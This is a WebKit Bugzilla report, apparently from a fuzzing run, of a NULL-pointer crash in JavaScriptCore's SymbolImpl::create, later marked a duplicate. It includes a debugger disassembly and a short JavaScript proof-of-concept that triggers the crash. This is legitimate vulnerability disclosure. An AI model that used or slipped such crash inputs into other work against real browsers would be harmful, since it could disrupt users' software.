WebKit Bugzilla
New
Browse
Log In
×
Sign in with GitHub
or
Remember my login
Create Account
·
Forgot Password
Forgotten password account recovery
RESOLVED DUPLICATE of
bug 197634
199796
Found a bug while fuzzing
https://bugs.webkit.org/show_bug.cgi?id=199796
Summary
Found a bug while fuzzing
zhoujielun
Reported
2019-07-15 04:29:35 PDT
# env ubuntu 18.04 webkit cb9ca26 # bug it crashed in the function WTF::SymbolImpl 0x1ef6345 <WTF::SymbolImpl::create(WTF::StringImpl&)+5> push r12 0x1ef6347 <WTF::SymbolImpl::create(WTF::StringImpl&)+7> push rbx 0x1ef6348 <WTF::SymbolImpl::create(WTF::StringImpl&)+8> mov r15, rsi → 0x1ef634b <WTF::SymbolImpl::create(WTF::StringImpl&)+11> mov r14, rdi 0x1ef634e <WTF::SymbolImpl::create(WTF::StringImpl&)+14> lea rdi, [rip+0x9104a7] # 0x28067fc 0x1ef6355 <WTF::SymbolImpl::create(WTF::StringImpl&)+21> call 0x7b2890 <__sanitizer_cov_trace_pc_guard> 0x1ef635a <WTF::SymbolImpl::create(WTF::StringImpl&)+26> mov ebp, DWORD PTR [r15+0x10] 0x1ef635e <WTF::SymbolImpl::create(WTF::StringImpl&)+30> mov eax, ebp 0x1ef6360 <WTF::SymbolImpl::create(WTF::StringImpl&)+32> and eax, 0x3 the r15 here is NULL, this is passed from the PrivateName function. The rsi it passed into the chunk is a value from stack, and its NULL. $r14 : 0x00007fffffffc400 → 0x0000000000000000 When we check the source code, we found that the javascript code triggered the javascript's internal method Symbol::create(), this function will new a symbol object, and will call Symbol function inside it. Symbol* Symbol::create(ExecState* exec, JSString* description) { VM& vm = exec->vm(); String desc = description->value(exec); Symbol* symbol = new (NotNull, allocateCell<Symbol>(vm.heap)) Symbol(vm, desc); symbol->finishCreation(vm); return symbol; } In this Symbol function, it will call another create function 45 enum DescriptionTag { Description }; 46 explicit PrivateName(DescriptionTag, const String& description) 47 : m_uid(SymbolImpl::create(*description.impl())) 48 { 49 } how ever the rsi is NULL... # poc function main() { function v3(v4,v5,v6,v7,v8) { 'use strict' const v10 = Symbol(v6); function v12(v13,v14,v15,v16,v17) { 'use strict' const v20 = [-268435456,-3654755103]; const v21 = [-3654755103,v20]; let v24 = v21; const v25 = v24.toLocaleString(); const v26 = v25.padEnd(2147483647,Promise); const v27 = v3(Promise,"gBxRp/rynU",v26); } const v28 = new Promise(v12); } const v29 = new Promise(v3); } noDFG(main); noFTL(main); main();
Attachments
Add attachment
proposed patch, testcase, etc.
Radar WebKit Bug Importer
Comment 1
2019-07-15 16:14:24 PDT
<
rdar://problem/53127278
>
Yusuke Suzuki
Comment 2
2019-07-30 10:54:02 PDT
*** This bug has been marked as a duplicate of
bug 197634
***
Note
You need to
log in
before you can comment on or make changes to this bug.
Top of Page
Format For Printing
XML
Clone This Bug